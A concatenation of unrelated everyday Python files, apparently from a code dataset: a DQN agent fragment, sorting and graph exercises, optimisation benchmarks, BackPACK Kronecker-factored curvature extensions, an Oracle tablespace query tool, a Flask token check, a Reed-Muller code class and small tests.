if k in [ord(v) for v in '123456789']:
actNum = int(unichr(k)) - 1
if k == 27:
raise NameError('Escape')
returnAction.intArray = [actNum]
self.cnt+=1
return returnAction
def agent_end(self, reward): # Episode Terminated
pass
def agent_cleanup(self):
pass
def agent_message(self, inMessage):
if inMessage.startswith("what is your name?"):
return "my name is skeleton_agent!"
if inMessage.startswith("freeze learning"):
self.policyFrozen = True
return "message understood, policy frozen"
if inMessage.startswith("unfreeze learning"):
self.policyFrozen = False
return "message understood, policy unfrozen"
if inMessage.startswith("save model"):
with open('dqn_model.dat', 'w') as f:
pickle.dump(self.DQN.model, f)
return "message understood, model saved"
if inMessage.startswith("load model"):
with open('dqn_model.dat', 'r') as f:
self.DQN.model = pickle.load(f)
return "message understood, model loaded"
if __name__ == "__main__":
#AgentLoader.loadAgent(dqn_agent(), "192.168.36.53")
envIP = '127.0.0.1'
if len(sys.argv) >= 2:
envIP = sys.argv[1]
print 'connecting ' + envIP
try:
AgentLoader.loadAgent(dqn_agent(), envIP)
finally:
cv2.destroyAllWindows()
|
from pywss import Pyws, route
@route('/test/example/1')
def example_1(request, data):
return data + ' - data from pywss'
if __name__ == '__main__':
ws = Pyws(__name__, address='127.0.0.1', port=7006)
#from ipdb import set_trace; set_trace()
ws.serve_forever() |
import cv2
import TD
img = cv2.imread('test.jpg')
rect = TD.text_detect(img)
for i in rect:
cv2.rectangle(img,i[:2],i[2:],(0,255,0))
cv2.imwrite('img-out.png', img) |
from typing import List
import random
def countingsort(nums: List[int], place: int) -> List[int]:
count_list = [0] * 10
for num in nums:
index = int(num / place) % 10
count_list[index] += 1
for i in range(1, 10):
count_list[i] += count_list[i-1]
results = [0] * len(nums)
i = len(nums) - 1
while i >= 0:
index = int(nums[i] / place) % 10
results[count_list[index]-1] = nums[i]
count_list[index] -= 1
i -= 1
return results
def radixsort(nums: List[int]) -> List[int]:
max_num = max(nums)
place = 1
while place < max_num:
nums = countingsort(nums, place)
place *= 10
return nums
if __name__ == "__main__":
nums = [4, 3, 6, 2, 3, 4, 7]
nums = [random.randint(0, 1000) for _ in range(10)]
print(radixsort(nums))
|
import optproblems.cec2005
import numpy as np
import time
from IA import *
import os
def IAalgorithm(n_parties, politicians, R, function, function_index, max_evaluations, desertion_threshold):
IA = IdeologyAlgorithm(n_parties=n_parties, politicians=politicians, R=R, function=function,
function_index=function_index, max_evaluations=max_evaluations, desertion_threshold=desertion_threshold)
return IA.ideology_algorithm()
if __name__ == "__main__":
dim = 10
repeats = 10
evaluations = 10000*dim
parties = 5
politicians = 30
r = 0.5
desertion_threshold = 10
if not os.path.exists('results'):
os.makedirs('results')
if not os.path.exists('convergence'):
os.makedirs('convergence')
np.random.seed(10)
f2 = optproblems.cec2005.F2(dim)
time1 = time.time()
results = np.array([IAalgorithm(n_parties=parties, politicians=politicians,
R=r, function=f2, function_index=2, max_evaluations=evaluations,
desertion_threshold=desertion_threshold) for _ in range(repeats)])
total_time = time.time() - time1
means = results.mean(axis=0)
solutions = results[:,-1]
mean_best = means[-1]
min_sol = np.min(solutions)
max_sol = np.max(solutions)
marks = means[0:-1]
with open("results/IA-results-10-2.txt", "w") as file:
print("F2: Shifted Schwefel's Problem 1.2", file=file)
print("Min\t Max\t Mean\t Mean time", file=file)
print("_______________________________________________", file=file)
print("{} {} {} {}".format(min_sol, max_sol, mean_best, total_time / repeats), file=file)
with open("convergence/IA-convergence-10-2.csv", "w") as file:
for i in range(len(marks)):
print("{},{}".format(10000*i, marks[i]), file=file)
np.random.seed(10)
f7 = optproblems.cec2005.F7(dim)
time1 = time.time()
results = np.array([IAalgorithm(n_parties=parties, politicians=politicians,
R=r, function=f7, function_index=7, max_evaluations=evaluations,
desertion_threshold=desertion_threshold) for _ in range(repeats)])
total_time = time.time() - time1
means = results.mean(axis=0)
solutions = results[:,-1]
mean_best = means[-1]
min_sol = np.min(solutions)
max_sol = np.max(solutions)
marks = means[0:-1]
with open("results/IA-results-10-7.txt", "w") as file:
print("F7: Shifted Rotated Griewank's Function without Bounds", file=file)
print("Min\t Max\t Mean\t Mean time", file=file)
print("_______________________________________________", file=file)
print("{} {} {} {}".format(min_sol, max_sol, mean_best, total_time / repeats), file=file)
with open("convergence/IA-convergence-10-7.csv", "w") as file:
for i in range(len(marks)):
print("{},{}".format(10000*i, marks[i]), file=file)
np.random.seed(10)
f13 = optproblems.cec2005.F13(dim)
time1 = time.time()
results = np.array([IAalgorithm(n_parties=parties, politicians=politicians,
R=r, function=f13, function_index=13, max_evaluations=evaluations,
desertion_threshold=desertion_threshold) for _ in range(repeats)])
total_time = time.time() - time1
means = results.mean(axis=0)
solutions = results[:,-1]
mean_best = means[-1]
min_sol = np.min(solutions)
max_sol = np.max(solutions)
marks = means[0:-1]
with open("results/IA-results-10-13.txt", "w") as file:
print("F13: Expanded Extended Griewank's plus Rosenbrock's Function (F8F2)", file=file)
print("Min\t Max\t Mean\t Mean time", file=file)
print("_______________________________________________", file=file)
print("{} {} {} {}".format(min_sol, max_sol, mean_best, total_time / repeats), file=file)
with open("convergence/IA-convergence-10-13.csv", "w") as file:
for i in range(len(marks)):
print("{},{}".format(10000*i, marks[i]), file=file)
np.random.seed(10)
f17 = optproblems.cec2005.F17(dim)
time1 = time.time()
results = np.array([IAalgorithm(n_parties=parties, politicians=politicians,
R=r, function=f17, function_index=17, max_evaluations=evaluations,
desertion_threshold=desertion_threshold) for _ in range(repeats)])
total_time = time.time() - time1
means = results.mean(axis=0)
solutions = results[:,-1]
mean_best = means[-1]
min_sol = np.min(solutions)
max_sol = np.max(solutions)
marks = means[0:-1]
with open("results/IA-results-10-17.txt", "w") as file:
print("F17: Rotated Hybrid Composition Function with Noise in Fitness", file=file)
print("Min\t Max\t Mean\t Mean time", file=file)
print("_______________________________________________", file=file)
print("{} {} {} {}".format(min_sol, max_sol, mean_best, total_time / repeats), file=file)
with open("convergence/IA-convergence-10-17.csv", "w") as file:
for i in range(len(marks)):
print("{},{}".format(10000*i, marks[i]), file=file)
np.random.seed(10)
f18 = optproblems.cec2005.F18(dim)
time1 = time.time()
results = np.array([IAalgorithm(n_parties=parties, politicians=politicians,
R=r, function=f18, function_index=18, max_evaluations=evaluations,
desertion_threshold=desertion_threshold) for _ in range(repeats)])
total_time = time.time() - time1
means = results.mean(axis=0)
solutions = results[:,-1]
mean_best = means[-1]
min_sol = np.min(solutions)
max_sol = np.max(solutions)
marks = means[0:-1]
with open("results/IA-results-10-18.txt", "w") as file:
print("F18: Rotated Hybrid Composition Function", file=file)
print("Min\t Max\t Mean\t Mean time", file=file)
print("_______________________________________________", file=file)
print("{} {} {} {}".format(min_sol, max_sol, mean_best, total_time / repeats), file=file)
with open("convergence/IA-convergence-10-18.csv", "w") as file:
for i in range(len(marks)):
print("{},{}".format(10000*i, marks[i]), file=file)
|
#!/usr/bin/env python
import json
import sys
import urllib2
twitter_url = 'http://search.twitter.com/search.json?q=from:{username}'
def main():
print 'What username would you like to display?'
username = raw_input('> ')
message = '\nMost recent tweets from @{0}'.format(username)
print message
print '=' * len(message.strip())
print '' # empty string for a blank line
## Fetch the users feed
response = urllib2.urlopen(twitter_url.format(username=username))
data = json.loads(response.read())
## No results? I has a sad. :(
if not data['results']:
print 'Sorry bub, nothing to display for @{0}\n'.format(username)
return
## Print the most recent tweets
for tweet in data['results'][:5]:
print tweet['created_at']
print tweet['text']
print ''
if __name__ == '__main__':
sys.exit(main())
|
# -*- coding: utf-8 -*-
from collections import deque
class Color:
BLACK = 0
WHITE = 1
class Solution:
def possibleBipartition(self, N, dislikes):
return self.isBipartite(self.toGraph(range(N), dislikes))
def toGraph(self, vertices, edges):
result = [[] for vertex in vertices]
for i, j in edges:
result[i - 1].append(j - 1)
result[j - 1].append(i - 1)
return result
def isBipartite(self, graph):
color = {}
for node in range(len(graph)):
if node in color:
continue
stack = deque([node])
color[node] = Color.BLACK
while stack:
current = stack.pop()
for neighbor in graph[current]:
if neighbor not in color:
stack.append(neighbor)
if color[current] == Color.BLACK:
color[neighbor] = Color.WHITE
elif color[current] == Color.WHITE:
color[neighbor] = Color.BLACK
elif color[current] == color[neighbor]:
return False
return True
if __name__ == "__main__":
solution = Solution()
assert solution.possibleBipartition(4, [[1, 2], [1, 3], [2, 4]])
assert not solution.possibleBipartition(3, [[1, 2], [1, 3], [2, 3]])
assert not solution.possibleBipartition(5, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5]])
|
from torch.nn import (
AvgPool2d,
Conv2d,
CrossEntropyLoss,
Dropout,
Flatten,
Linear,
MaxPool2d,
MSELoss,
ReLU,
Sigmoid,
Tanh,
ZeroPad2d,
)
from backpack.extensions.backprop_extension import BackpropExtension
from backpack.extensions.curvature import Curvature
from backpack.extensions.secondorder.hbp.hbp_options import (
BackpropStrategy,
ExpectationApproximation,
LossHessianStrategy,
)
from . import activations, conv2d, dropout, flatten, linear, losses, padding, pooling
class HBP(BackpropExtension):
def __init__(
self,
curv_type,
loss_hessian_strategy,
backprop_strategy,
ea_strategy,
savefield="hbp",
):
self.curv_type = curv_type
self.loss_hessian_strategy = loss_hessian_strategy
self.backprop_strategy = backprop_strategy
self.ea_strategy = ea_strategy
super().__init__(
savefield=savefield,
fail_mode="ERROR",
module_exts={
MSELoss: losses.HBPMSELoss(),
CrossEntropyLoss: losses.HBPCrossEntropyLoss(),
Linear: linear.HBPLinear(),
MaxPool2d: pooling.HBPMaxpool2d(),
AvgPool2d: pooling.HBPAvgPool2d(),
ZeroPad2d: padding.HBPZeroPad2d(),
Conv2d: conv2d.HBPConv2d(),
Dropout: dropout.HBPDropout(),
Flatten: flatten.HBPFlatten(),
ReLU: activations.HBPReLU(),
Sigmoid: activations.HBPSigmoid(),
Tanh: activations.HBPTanh(),
},
)
def get_curv_type(self):
return self.curv_type
def get_loss_hessian_strategy(self):
return self.loss_hessian_strategy
def get_backprop_strategy(self):
return self.backprop_strategy
def get_ea_strategy(self):
return self.ea_strategy
class KFAC(HBP):
"""
Approximate Kronecker factorization of the Generalized Gauss-Newton/Fisher
using Monte-Carlo sampling.
Stores the output in :code:`kfac` as a list of Kronecker factors.
- If there is only one element, the item represents the GGN/Fisher
approximation itself.
- If there are multiple elements, they are arranged in the order such
that their Kronecker product represents the Generalized Gauss-Newton/Fisher
approximation.
- The dimension of the factors depends on the layer, but the product
of all row dimensions (or column dimensions) yields the dimension of the
layer parameter.
.. note::
The literature uses column-stacking as vectorization convention,
but ``torch`` defaults to a row-major storing scheme of tensors.
The order of factors might differs from the presentation in the literature.
Implements the procedures described by
- `Optimizing Neural Networks with Kronecker-factored Approximate Curvature
<http://proceedings.mlr.press/v37/martens15.html>`_
by James Martens and Roger Grosse, 2015.
- `A Kronecker-factored approximate Fisher matrix for convolution layers
<http://proceedings.mlr.press/v48/grosse16.html>`_
by Roger Grosse and James Martens, 2016
"""
def __init__(self, mc_samples=1):
self._mc_samples = mc_samples
super().__init__(
curv_type=Curvature.GGN,
loss_hessian_strategy=LossHessianStrategy.SAMPLING,
backprop_strategy=BackpropStrategy.SQRT,
ea_strategy=ExpectationApproximation.BOTEV_MARTENS,
savefield="kfac",
)
def get_num_mc_samples(self):
return self._mc_samples
class KFRA(HBP):
"""
Approximate Kronecker factorization of the Generalized Gauss-Newton/Fisher
using the full Hessian of the loss function w.r.t. the model output
and averaging after every backpropagation step.
Stores the output in :code:`kfra` as a list of Kronecker factors.
- If there is only one element, the item represents the GGN/Fisher
approximation itself.
- If there are multiple elements, they are arranged in the order such
that their Kronecker product represents the Generalized Gauss-Newton/Fisher
approximation.
- The dimension of the factors depends on the layer, but the product
of all row dimensions (or column dimensions) yields the dimension of the
layer parameter.
.. note::
The literature uses column-stacking as vectorization convention.
This is in contrast to the default row-major storing scheme of tensors
in :code:`torch`. Therefore, the order of factors differs from the
presentation in the literature.
- `Practical Gauss-Newton Optimisation for Deep Learning
<http://proceedings.mlr.press/v70/botev17a.html>`_
by Aleksandar Botev, Hippolyt Ritter and David Barber, 2017.
Extended for convolutions following
- `A Kronecker-factored approximate Fisher matrix for convolution layers
<http://proceedings.mlr.press/v48/grosse16.html>`_
by Roger Grosse and James Martens, 2016
"""
def __init__(self):
super().__init__(
curv_type=Curvature.GGN,
loss_hessian_strategy=LossHessianStrategy.SUM,
backprop_strategy=BackpropStrategy.BATCH_AVERAGE,
ea_strategy=ExpectationApproximation.BOTEV_MARTENS,
savefield="kfra",
)
class KFLR(HBP):
"""
Approximate Kronecker factorization of the Generalized Gauss-Newton/Fisher
using the full Hessian of the loss function w.r.t. the model output.
Stores the output in :code:`kflr` as a list of Kronecker factors.
- If there is only one element, the item represents the GGN/Fisher
approximation itself.
- If there are multiple elements, they are arranged in the order such
that their Kronecker product represents the Generalized Gauss-Newton/Fisher
approximation.
- The dimension of the factors depends on the layer, but the product
of all row dimensions (or column dimensions) yields the dimension of the
layer parameter.
.. note::
The literature uses column-stacking as vectorization convention.
This is in contrast to the default row-major storing scheme of tensors
in :code:`torch`. Therefore, the order of factors differs from the
presentation in the literature.
Implements the procedures described by
- `Practical Gauss-Newton Optimisation for Deep Learning
<http://proceedings.mlr.press/v70/botev17a.html>`_
by Aleksandar Botev, Hippolyt Ritter and David Barber, 2017.
Extended for convolutions following
- `A Kronecker-factored approximate Fisher matrix for convolution layers
<http://proceedings.mlr.press/v48/grosse16.html>`_
by Roger Grosse and James Martens, 2016
"""
def __init__(self):
super().__init__(
curv_type=Curvature.GGN,
loss_hessian_strategy=LossHessianStrategy.EXACT,
backprop_strategy=BackpropStrategy.SQRT,
ea_strategy=ExpectationApproximation.BOTEV_MARTENS,
savefield="kflr",
)
|
import Choice
def ora_datafile(curs, conn):
tbsnm = input("请输入表空间名:")
df = "select rownum,file_name,bytes/1024/1024,AUTOEXTENSIBLE,maxbytes/1024/1024 from dba_data_files \
where tablespace_name='{}' order by 1".format(tbsnm.upper())
# print(df)
rr = curs.execute(df)
for result in rr:
rowno = result[0]
dfnm = result[1]
dfsz = result[2]
autoextensible = result[3]
maxsz = result[4]
if autoextensible == 'YES':
print('表空间{}的第{}个数据文件路径是{},当前大小为{}MB,数据文件可扩展到{}MB。'.format(tbsnm, rowno, dfnm, dfsz, maxsz))
else:
print('表空间{}的第{}个数据文件路径是{},当前大小为{}MB,数据文件不可扩展。'.format(tbsnm, rowno, dfnm, dfsz))
incont = input("是否继续查询数据文件:(输入1继续,输入0返回上一菜单,其他输入退出)")
if incont == '1':
ora_datafile(curs, conn)
elif incont == '0':
Choice.choice(curs, conn)
else:
return True
|
from Camel import config
from flask import request, make_response
import sys
import MySQLdb
def db_connect(config):
db_conf = config['database']
try:
db = MySQLdb.connect(host=db_conf['HOST'],
user=db_conf['USER'],
passwd=db_conf['PASSWORD'],
db=db_conf['NAME'],
charset='utf8'
)
except:
print("Can't connect to database")
sys.exit(1)
return db
def is_authenticated():
if 'AuthToken' in request.headers:
token = request.headers['AuthToken']
else:
return False
db = db_connect(config)
sql = "SELECT `token` from `sessions` WHERE `token` = %(token)s"
c = db.cursor()
c.execute(sql, {'token': token})
rows = c.fetchall()
c.close()
db.close()
return len(rows)==1
|
"""This is a module"""
import os
from app.views import create_app
from database import database
config_name = os.getenv('APP_SETTINGS') # config_name = "development"
app = create_app(config_name)
database(app)
if __name__ == '__main__':
app.run(debug=True)
|
import itertools
class RM:
def __init__(self, r = 0, m = 1):
if r > m or r < 0 or m < 1:
raise Exception("r > m")
self.r = r
self.m = m
self.n = 2 ** m
self.generating_matrix = self.__create_generating_matrix__()
self.k = len(self.generating_matrix)
def __create_generating_matrix__(self):
generating_matrix = [2 ** self.n - 1]
if self.r != 0:
count = self.n
for m in range(self.m):
count //= 2
generating_matrix.append(int('0b' + 2**m * ('0'*count + '1'*count), 2))
help_matrix = generating_matrix.copy()
single_row = help_matrix.pop(0)
for r in range(2, self.r + 1):
for combo in itertools.combinations(help_matrix, r):
help_row = single_row
for row in combo:
help_row &= row
generating_matrix.append(help_row)
return generating_matrix
def __bin__(self, number):
return bin(number)[2:].zfill(self.n)
def print(self):
for row in self.generating_matrix:
print(self.__bin__(row))
print()
# print('r =', self.r)
# print('m =', self.m)
# print('n =', self.n)
print('k =', self.k)
def copy(self, another_RM):
self.k = another_RM.k
self.n = another_RM.n
self.m = another_RM.m
self.r = another_RM.r
self.generating_matrix = another_RM.generating_matrix.copy()
def mult_rm_matrix(self, another_RM):
if self.m != another_RM.m:
raise Exception("columns are not equal")
help_matrix = self.generating_matrix.copy()
for row, another_row in itertools.product(help_matrix, another_RM.generating_matrix):
new_row = row & another_row
if new_row not in self.generating_matrix:
self.generating_matrix.append(new_row)
if self.r + another_RM.r < self.m:
self.r += another_RM.r
else:
self.r = self.m
self.k = len(self.generating_matrix)
def dual(self):
positions_stepped_view = [-1] * self.n
row_pos = 0
while row_pos != self.k:
remaining_rows = self.generating_matrix.copy()
row = remaining_rows.pop(row_pos)
column_in_row_pos = 0
for column_in_row in self.__bin__(row):
if column_in_row == '1':
# if positions_stepped_view[column_in_row_pos] == -1:
for remaining_row in remaining_rows:
if self.__bin__(remaining_row)[column_in_row_pos] == '1':
self.generating_matrix[self.generating_matrix.index(remaining_row)] ^= row
positions_stepped_view[column_in_row_pos] = row_pos
break
column_in_row_pos += 1
row_pos += 1
#
# next step
#
#
# kill null
#
while 0 in self.generating_matrix:
index = self.generating_matrix.index(0)
self.generating_matrix.pop(index)
for row in range(self.n):
if positions_stepped_view[row] > index:
positions_stepped_view[row] -= 1
self.k = len(self.generating_matrix)
#
# next step
#
row_pos = 0
single_matrix_pos = -1
helper_matrix = []
while row_pos != self.n - self.k:
helper_row = ''
single_matrix_pos = positions_stepped_view.index(-1, single_matrix_pos + 1)
pos_in_positions = 0
for position_stepped_view in positions_stepped_view:
if position_stepped_view == -1:
if pos_in_positions == single_matrix_pos:
helper_row += '1'
else:
helper_row += '0'
else:
helper_row += self.__bin__(self.generating_matrix[position_stepped_view])[single_matrix_pos]
pos_in_positions += 1
helper_matrix.append(int('0b' + helper_row, 2))
row_pos += 1
self.generating_matrix = helper_matrix
self.r = self.m - self.r - 1
self.k = len(self.generating_matrix)
def add_matrix_to_right(self, number_of_columns):
new_matrix = ''
for i in range(number_of_columns):
new_matrix += '0' * (i + 1) + '1' + '0' * (self.k - i - 2)
for i in range(number_of_columns):
for j in range(self.k):
self.generating_matrix[j] = int(self.__bin__(self.generating_matrix[j]) + new_matrix[i * self.k + j], 2)
self.n += 1
def conjunction(self, another_RM):
self.generating_matrix += another_RM.generating_matrix
self.k += another_RM.k
self.dual()
def kick_column(self, number):
number += 1
if number < 1 or number > self.n:
raise Exception('Column not found')
if number == 1:
for row in range(self.k):
self.generating_matrix[row] = int('0b' + self.__bin__(self.generating_matrix[row])[number:], 2)
elif number == self.n:
for row in range(self.k):
self.generating_matrix[row] = int('0b' + self.__bin__(self.generating_matrix[row])[:number - 1], 2)
else:
for row in range(self.k):
self.generating_matrix[row] = int('0b' + self.__bin__(self.generating_matrix[row])[:number - 1] + self.__bin__(self.generating_matrix[row])[number:], 2)
self.n -= 1
|
"""
This type stub file was generated by pyright.
"""
from distutils import version
"""Various utilities for parsing OpenAPI operations from docstrings and validating against
the OpenAPI spec.
"""
COMPONENT_SUBSECTIONS = { 2: { "schema": "definitions","response": "responses","parameter": "parameters","security_scheme": "securityDefinitions" },3: { "schema": "schemas","response": "responses","parameter": "parameters","example": "examples","security_scheme": "securitySchemes" } }
def build_reference(component_type, openapi_major_version, component_name):
"""Return path to reference
:param str component_type: Component type (schema, parameter, response, security_scheme)
:param int openapi_major_version: OpenAPI major version (2 or 3)
:param str component_name: Name of component to reference
"""
...
def validate_spec(spec):
"""Validate the output of an :class:`APISpec` object against the
OpenAPI specification.
Note: Requires installing apispec with the ``[validation]`` extras.
::
pip install 'apispec[validation]'
:raise: apispec.exceptions.OpenAPIError if validation fails.
"""
...
class OpenAPIVersion(version.LooseVersion):
"""OpenAPI version
:param str|OpenAPIVersion openapi_version: OpenAPI version
Parses an OpenAPI version expressed as string. Provides shortcut to digits
(major, minor, patch).
Example: ::
ver = OpenAPIVersion('3.0.2')
assert ver.major == 3
assert ver.minor == 0
assert ver.patch == 1
assert ver.vstring == '3.0.2'
assert str(ver) == '3.0.2'
"""
MIN_INCLUSIVE_VERSION = ...
MAX_EXCLUSIVE_VERSION = ...
def __init__(self, openapi_version) -> None:
...
@property
def major(self):
...
@property
def minor(self):
...
@property
def patch(self):
...
def trim_docstring(docstring):
"""Uniformly trims leading/trailing whitespace from docstrings.
Based on http://www.python.org/peps/pep-0257.html#handling-docstring-indentation
"""
...
def dedent(content):
"""
Remove leading indent from a block of text.
Used when generating descriptions from docstrings.
Note that python's `textwrap.dedent` doesn't quite cut it,
as it fails to dedent multiline docstrings that include
unindented text on the initial line.
"""
...
def deepupdate(original, update):
"""Recursively update a dict.
Subdict's won't be overwritten but also updated.
"""
...
|
from Dota2AbilitiesForAlexa import JsonParser
from Dota2AbilitiesForAlexa import Dota2SkillBuilder
myParser = JsonParser()
Dota2SkillBuilder(myParser.get_hero_abilities(), myParser.get_ability_details())
|
import pkg_resources
from datetime import datetime
from unittest.mock import sentinel
import pandas as pd
from . import process_temperature_log as module
temperature_log_path = pkg_resources.resource_filename(
"osmo_camera", "test_fixtures/temperature.csv"
)
class TestProcessTemperatureLog:
def test_parses_raw_data_and_applies_calibration(self, mocker):
mocker.patch("os.path.join").return_value = temperature_log_path
mocker.patch.object(
module, "temperature_given_digital_count_calibrated"
).return_value = sentinel.temperature
actual = module.process_temperature_log(
experiment_dir=sentinel.mock_experiment_dir,
local_sync_directory_path=sentinel.mock_local_sync_path,
)
expected_temperature_data = pd.DataFrame(
{
"capture_timestamp": [
datetime(2019, 4, 30, 16, 29, 5),
datetime(2019, 4, 30, 16, 29, 11),
],
"digital_count": [20007, 19993],
"voltage": [2.5003263, 2.5025763],
"temperature_c": [sentinel.temperature, sentinel.temperature],
}
)
pd.testing.assert_frame_equal(
actual, expected_temperature_data, check_less_precise=True
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.